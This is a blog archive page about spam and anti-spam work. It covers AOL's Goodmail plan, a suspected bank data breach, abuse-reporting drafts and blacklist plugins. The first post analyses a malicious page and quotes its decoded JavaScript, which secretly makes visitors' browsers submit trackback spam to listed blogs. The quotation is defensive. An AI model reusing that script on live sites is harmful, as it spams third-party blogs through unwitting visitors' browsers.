Personal Website of Yakov Shafranovich

Spreading Comment and Trackback Spam Through Zombie Browsers

Since my move to Wordpress, I have been noticing a lot of funny track back hits going back to my old Movable Type installation. First of all, all of these hits were coming back from different IP addresses and different browsers. Second, they all had the same refer. Something was fishy. On further examination, I found something really interesting

It seems that the refer is hosting a malicious HTML page. That page consists of a set of Javascripts which load new frames and submit track back pings to other blogs on the Internet. That means that anyone going to that malicious page is automatically submitting trackback spam somewhere else on the Net. When blog owners see the spam, they go back to check out the refer and end up on the malicios page, which then submits more track back spams in the background. The track backs themselves lead to fake blogs and search results, which eventually either lead to drug stores or ad-populated pages.

There are several interesting things here. First - the malicious page kind of propagates itself. Second, the page does not use any kind of security exploits - everything is done through regular Javascripts. Third, there is apparently enough interest in refers that it generates enough traffic to affect other sites. All of these is very similar to the way regular spam and viruses are spread - through zombie computers, except in this case the browsers are zombies.

Below are some snippets from the code of this site (you can view the decoded site source here - courtesy of Stephane “Gooby” Theroux’s decoder):

First the site loads an array with the target track back URLs:

var ss = new Array('http://140.99.61.57/cgi-bin/mt/mt-tb.cgi/211', 'http://64.130.58.178/cgi-sys/cgiwrap/ebradio/managed-mt/mt-tb.cgi/55', 'http://www.creativedestruction.com/MT/mt-tb.cgi/25', 'http://www.thirstytheologian.com/mt/mt-tb.cgi/287', 'http://www.ultrasparky.org/mt/mt-tb.cgi/5406', 'http://blog.avramovic.info/bblog/trackback.php/9/', 'http://www.technologyevangelist.com/cgi-bin/mt-tb.fcgi/685', 'http://www.edspresso.com/cgi-bin/mt/mt-t.cgi/1002', 'http://hellyes.nl/iam/wp-trackback.php?p=3', 'http://varnam.org/mt33/mt-tb.cgi/157', 'http://varnam.org/mt33/mt-tb.cgi/157');

The next step is to create the frames and forms inside:


var d = parent.fr1.document;
d.write('<div id=mainpage style="display:none">');
d.write('<div id=tbdescr align=center></div>');
d.write('<form name=fff method=POST target=fr2>');
d.write('<input type=text name=url>');
d.write('<input type=text name=title>');
d.write('<input type=text name=excerpt>');
d.write('<input type=text name=blogname>');
d.write('</form>');
d.write('</div>');
tbsp();


Third step is to load up the forms and submit:


function tbsp()
{
var d = parent.fr1.document;
d.getElementById('tbdescr').innerHTML = ii ': ' unescape(ss[ii]);
d.fff.action = unescape(ss[ii]);
d.fff.url.value = unescape('http://getdayfile.nicespace.ca');
d.fff.title.value = unescape('Diphtheria');
d.fff.excerpt.value = 'Read more about ' unescape('Diphtheria');
d.fff.blogname.value = unescape('Diphtheria');
d.fff.submit();
...


Fourth step - rinse, repeat:


if (ii > 0) {
ii--;
setTimeout('tbsp()', 10000);
} else {
setTimeout('refresh()', 2000);
}


The reason why this is allowed to happen is due to the fact that the browser does not restrict interaction with child frames. Thus, dynamically created frames with malicious form submits can happen without user interaction. It is not out of the realm of possibility for this type of attack to be extended to any sort of Web service or web application that can accept GET or POST. In fact it would probably be trivial but most social networks and web applications should filter out Javascript.

At the current time there is no protection against this type of attack other than disabling Javascript or having the browser warn you before submitting a form.

Comments are welcome at blog /at/ shaftek [dot] org.

Posted in Spam and Email, Website | No Comments »

Why Paying People to Crack CAPTCHAs Might Be Good

Almost four years ago I posted about a spammer that was using a free porn site as a way to get people to solve CAPTCHAs (those annoying images that ask you to type in stuff). Two Slashdot stories from a few months back discuss how spammers might be hiring people in developing countries to solve them. The going rate seems to be about $0.60/hour.

Now unlike most, I think this may turn out to be a good thing. Why? Because it imposes some cost on the spammers. Unfortunatly, the cost isn’t high enough, but nevertheless it is something. However, in some ways it is similar to e-postage which as my collegue, John R. Levine, addressed does not solve spam. Instead what may be the final solution to spam is increased cooperation among ISPs, along the lines of what Carl Hutzler wrote a while back.

Posted in Spam and Email | No Comments »

Security Breach at EmigrantDirect

I had a high interest savings account with EmigrantDirect for about 1 1/2 years. About July of 2006 this year, Emigrant switched their providers for online banking, resulting in a new interface for their website. Shortly after that switch, I have begun to get spam messages on the email address that is only used for EmigrantDirect before the switch. I contacted their old provider, MetaVante, who did a search of their systems and did not find any incidents. HOWEVER, when I contacted Emigrant, they confirmed the problem as you can see from the email reply below:

Thank you for contacting EmigrantDirect. Kindly accept our apologies for any inconvenience these unsolicited emails may have caused you. We are aware of the situation and are currently investigating the matter. Please forward us a copy of those e-mails you are receiving to customerservice@emigrantdirect.com and we will escalate this matter to our security department for a proper investigation.

This means that somehow their customer information (including my account) was stolen sometime before the switch to their new system happened in July (maybe that’s why they switched?). Now the interesting question, is that Emigrant is based in NY state which has a mandatory reporting law as seen in this form. I asked Emigrant whether they plan on doing so and got the following reply:

Thank you for contacting us. We have forwarded your email to our Legal Department.

Given that aside from my email address, other sensitive information such as my social security number may have been stolen, I closed my account with them and moved over to HSBC. UNTIL THEY ARE MORE FORTHCOMING ON THE ISSUE, I RECOMMEND THAT EVERYONE SWITCHES AWAY FROM THEM AS WELL. You never know what information they lost.

On a closing note, I am not the only one having this issue. Here are links to some of the other people who have seen this behavior as well:
o Motley Fool’s forums - 1, 2, and 3
o Comments at FiveCentNickel - see #2
o ArtTechnica forums - here
o A post on BankDeals - here and comments here
o Comments on SlickDeals - here

This type of thing has happened before with AmeriTrade.

P.P.S. Spam samples available upon request.

Posted in Spam and Email | 2 Comments »

NY Times Article on Goodmail and AOL

Dave Winer points to a NY Times story on the use of Goodmail by AOL which I pointed out eariler. Apparently, Yahoo is on the act as well.

Posted in Spam and Email | No Comments »

AOL to Charge Senders for Some Emails?

A recent post on Circle-ID by Matt Blumberg states that AOL is planning to charge some commercial senders for specific types of emails. A related story makes things a bit more clearer:

In a bid to protect its members from e-mail fraud and phishing, and to offer consistency to commercial e-mail senders, AOL today will begin implementing Goodmail’s cryptographic CertifiedEmail program and phasing out its IP-based Enhanced Whitelist.

As part of its e-mail security practices, AOL blocks the display of images and hyperlinks on most high-volume messages, except if senders are on the AOL Enhanced whitelist and maintain very low complaint rates. Beginning today, AOL will also allow senders who have undergone accreditation through Goodmail to display images and hyperlinks by default. Goodmail charges accredited companies a fraction of a cent per message sent.

In addition, AOL will add a “trust symbol” to messages sent by Goodmail’s CertifiedEmail senders. It will appear in the inbox and the message window, so members will understand that a sender’s identity and reputation have been verified.

There are three important points here:
1. This fee is only charged for specific types of emails (”enhanced whitelist”) - with links and images. All other emails can be sent plain text.
2. A trust symbol will be used by AOL.
3. A cryptographic token is used for signing email similar to DKIM.

Leaving aside the business aspects, what is interesting about this, is that AOL is basically providing for the community a test-case of how three different things would work: e-postage, trust symbols (like browser padlocks) and cryptographic tokens. All of this of course will be very interesting to watch, especially the spammers’ reactions to this.

UPDATE: Suresh states in the comments at Circle-ID that the entire story might be wrong and AOL is not shutting down its enhanced whitelist. ALSO, it seems that the person who wrote the Circle-ID article is in fact a CEO of a competitor to GoodMail.

Posted in Spam and Email | No Comments »

SpamAssassin and My Spam Volume

For quite some time I have been using the SpamAssassin installation provided by our provider to tag my business email account. However, only a few days ago did I actually set it to delete all emails that score over 10.0 server-side. Suprisengly enough, my spam volume dropped to almost a trickle since than. I specifically used such high score (which SA recommends for ISP environments). Additionally, I had reviewed all of my incoming spam over the past year or so to see if SA was wrong.

Good work, Justin!

UPDATE: So far, after almost a month of running it this way, I have seen no ill side effects.

Posted in Personal, Spam and Email | No Comments »

Upgrading to MT v3.17

After getting hit with several spam floods over the past few weeks, I am upgrading to v3.17 of MovableType. Please be patient as there might be occasional hiccups.

UPDATE: Upgrade has been succesful.

Posted in Website | 1 Comment »

Final “-01″ Feedback Reporting Draft

The final draft (-01) is here (HTML and TXT). Diffs are also available (HTML and TXT). As always comments are always welcome either to the mailing list or to me.

One of these days I am going to get around to writing a more complete background of this draft and the process around it.

Posted in Projects, Standards, Spam and Email | No Comments »

Follow Up on the Abuse Report Draft

Since the initial draft two 1/2 weeks ago, a lot of things took place. First of all, Dave was nice enough to open up a public mailing list for anyone who wants to comment on the draft. I will be putting information on it into the -01 draft which is currently in the works. Second, there is now a small public page called “ARF” or “Abuse Reporting Format” which will hopefully contain all the info on this in one easy to find place. Third, I am working on the next (-01) draft which will hopefully explain things better than the current one and put in place a normal extensibility mechanism (an IANA registry similar to what the SIP folks have).

There is also a lot of activity behind the scenes but I am not at liberty (yet) to disclose it. Needless to say I am very happy and excited that things are moving along.

Posted in Projects, Spam and Email | No Comments »

New Focus for Blog Spam: Spreading Spyware

Historically, blog spam has been used to raise search engine rankings. However, with the recent introduction of the “nofollow” directive this avenue of profit has been essentially killed off. So now comment spammers are moving over to a new area of profit: spyware (phishing and other similar stuff will probably follow). While there have been reports of spyware in Google’s Blogger service, triggered by the “next blog” feature; I haven’t yet seen reports of trackback or comment spam doing the same. Well until now.

The original spam comment to my blog came from some IP address in the Ukraine, most likely to be a hijacked machine. It pointed to a site hosted on a free provider under the URL “http://www.freewebs.com/baby-names/” (DO NOT GO THERE UNLESS YOU ARE SECURE). After getting the page source with wget, I was suprised to see that’s its mainly empty. It consisted of a Javascript include in the beginning, a set of font size “2″ HR tags in the middle which are basically invisible to normal users, and a stats tracker in the end. The page is still up at the time of writing but I reported it to the ISP so its probably going to be taken down soon. You can download a ZIP file containing all of the files described in this post right over here.

Now what value does an empty page serve? After looking at the Javascript include located in the beginning of the file, it seems a lot. The javascript file comes from a site called “ysbweb.com” which is owned by “Interactive Search Technologies” or IST. They market a search toolbar which seems to be spyware. NOW, keep in mind that this Javascript file DOES NOT come from the “free” page that was originally refered to via the trackback. Rather it is a file provided by the spyware vendor themselves, and therefore all of the bad stuff that it does is directly caused by them not by some hacker.
Read the rest of this entry »

Posted in Spam and Email | No Comments »

Turning Comments On

While going through some old posts tonight I started wondering why many of them have comments turned off. After some time I remember that I installed the MT-CloseComments plugin. I have shut that plugin off so I can have comments again and hopefully some of the anti-spam techniques that I have been trying out will work.

Posted in Website | No Comments »

Domainkeys and GPL

Andy mentions a rather interesting list message from Sam Varshavchik, the author of Courier (an open source MTA licensed under the GPL):

> I was wondering if (Yahoo”s) Domainkeys is considered to be implemented in Courier.

No. Yahoo has patent claims on Domainkeys, which are not licensed under GPL-compatible terms.

For the curious, the IPR terms for DomainKeys can be found here. The actual DK license is here. To me it is unclear what exactly the problem is but of course IANAL.

UPDATE: It seems that section 3.4 is one of the culprits being similar to the advertising clause in the original BSD license (see FSF writeup).

Posted in Spam and Email | 2 Comments »

Distributed xLists for Blogs

Following up on my earlier post about the use of email blacklists for blogs and Andy’s comments, Andy and myself started thinking about how to improve blacklists and whitelists for blogs. What we came up with is “Distributed xLists” - in black, white and shades of gray. Instead of following a centralized model, we chose a distributed peer to peer model that allows folks to publish, combine and redistribute blacklist/whitelist information while attaching their own opinion to it as well. Additionally, instead of plain white and black colors, our lists have weights allowing all kinds of shady stuff We hope that the trust in place between individuals combined with the flexbility of weighted opinions would fare better than the existing stuff.

For full details, you can read the HTML version of our Internet draft at Andy’s site (which should post soon to the IETF’s repository) and Andy’s comments. Now I just have to get around to updating my MT plugin.

Posted in Projects, Spam and Email | No Comments »

Why Bad is Good in Spam

While perusing the news, I came across a rather interestingly titled article at CNET: “Zombie trick expected to send spam sky-high”. As many other spam-related stories, this one had an apocalyptic feel to it as well:

According to the SpamHaus Project–a U.K.-based antispam compiler of blacklists that block 8 billion messages a day–a new piece of malicious software has been created that takes over a PC. This “zombie” computer is then used to send spam via the mail server of that PC’s Internet service provider. This means the junk mail appears to come from the ISP, making it very hard for an antispam blacklist to block it. Previously, zombie PCs have been used as mail servers themselves, sending spam e-mails directly to recipients.

This will cause serious problems for the e-mail infrastructure, as it is impractical to block mail with domain names from large ISPs. Linford predicts that ISPs will see a growth in the volume of bulk mail they send and receive over the next two months, with spam levels rising from 75 percent of all e-mail to around 95 percent within a year.

“The e-mail infrastructure is beginning to fail,” Linford warned. “You’ll see huge delays in e-mail and servers collapsing. It’s the beginning of the e-mail meltdown.”

Oh no, the email infrustructure “is beginning to fail”, its a “meldown”! Man the deck, close the hatches, the spammers are coming! Seriously, this is probably a thousand times this has been said and email is still standing. Quite the contrary, this development is not the beginning of a spam meltdown but rather the beginning of the end for the spam plague in general. Why do I think so? Lets sit down, analyze the fact and think for ourselves.
Read the rest of this entry »

Posted in Spam and Email | Comments Off

An MT Plugin for Banned IP Lists

Andy’s post got me thinking about publishing individual blacklists (something that Jay Allen of MT-BlackList has given up on). So, I put together a simple plugin for MovableType called “MT-Banned-List” that adds tags for generating a list of banned IP addresses. You can download version 0.1 here (just stick the .pl file into your plugins directory, and use one of the sample templates). Documentation is inside the plugin itself. You can see my own ban list in RSS 2.0 or plain text format.

Hopefully we can leverage individual blacklists in a distributed fashion for dealing with spam. This is just a first step.

UPDATE: See version 0.2.

Posted in Projects, Programming, Spam and Email | 2 Comments »

Fighting Trackback Spam with Email Blacklists

(For MT-Banned-List plugin for publishing the internal MT IP ban list, please see this post)

Overnight I got slammed by two trackback spam attacks to my blog, both lasting about two hours and originating from over 20 IPs. I added all of them to my banned list to prevent further occurrences. HOWEVER, I also sat down and analyzed the data to see if it correlates with email spam. Logically speaking it is highly unlikely that comment spammers have so many machines so the most logical conclusions is that they are either using open proxies or infected residential machines. Incidentally the same type of machines are also used for email spam, so it is logical to assume that the data will crossmatch.

WARNING: The amount of data that I collected is probably not statistically sufficient to draw conclusions

To get my results, I collated a list of IPs used in the first attack, did a reverse DNS check on them and looked them up in SenderBase. Out of 28 IPs, only 13 had rDNS entries (46%), out of which about 8 looked like straight broadband or dialup (28%). All of the IPs were located all over the world including universities, companies, and regular users, leading me further to believe that these were hijacked machines.

The most interesting data came from SenderBase: 17 IPs (60%) were listed in at least one spam blacklist as follows:

DSBL open proxy - 8 (28%)
CBL open proxy - 10 (35%)
SORBS open proxy - 4 (14%)
Blitzed open proxy - 4 (14%)
SpamCop spam - 5 (17%)
SORBS spam - 1 (3%)

Out of the remaining 11 IPs, 4 (14%) had their mail volume spiked in the past 30 days, with some spiking as high as over 1500% in the past day. All together, only 7 (25%) were not listed in any blacklist or had volume spikes.

What this means is that we can successfully use email spam blacklists for blocking comment and trackback spam, especially the ones that check for open proxies NOT spam. For example, using the four blacklists that detect open proxies (CBL, DSBL, SORBS and Blitzed) would take care of 16 IPs (57%) of trackback spam I got. Unfortunately, the current plugins (MT-DSBL and WP-DSBL) only check against one list - DSBL which in my case catches only 28% of spam. Of course, adding URL blacklists such as SURL makes this stuff work even better.

UPDATE #1: For MT 2.6 there is currently no way to check blacklists since Brad’s MT-DSBL plugin is only for MT v3. For MT v2.6, do the following:
1. In your blog directory, go to lib/MT/App/.
2. Open “Trackback.pm” in a text editor (backup first!).
3. Find a line starting “## Check if user has pinged recently”.
4. Insert the following right above that line:

## Check blacklists
my $rem_ip = $app->remote_ip;
my ($a, $b, $c, $d) = split(/\./, $rem_ip);
my $rev = “$d.$c.$b.$a”;
## DSBL list
my $lookup = “$rev.list.dsbl.org”;
if(gethostbyname($lookup))
{ return $app->_response(Error =>
$app->translate(”Your IP is blacklisted by DSBL, $lookup see http://dsbl.org/listing?$rem_ip.”));
}

You can easily change it for any other blacklist as well.

UPDATE #2: As per Andy Newton’s comment, keep in mind that blacklists for email have not been all that good so caution is advised (also see this draft).

Posted in Spam and Email | 6 Comments »

Stopping Spam by Being Accountable

John Levine just posted an excellent article from Carl Hutzler of AOL about how the real solution to spam is accountability and action by ISPs on their own outbound traffic. Excellent read.

Posted in Spam and Email | Comments Off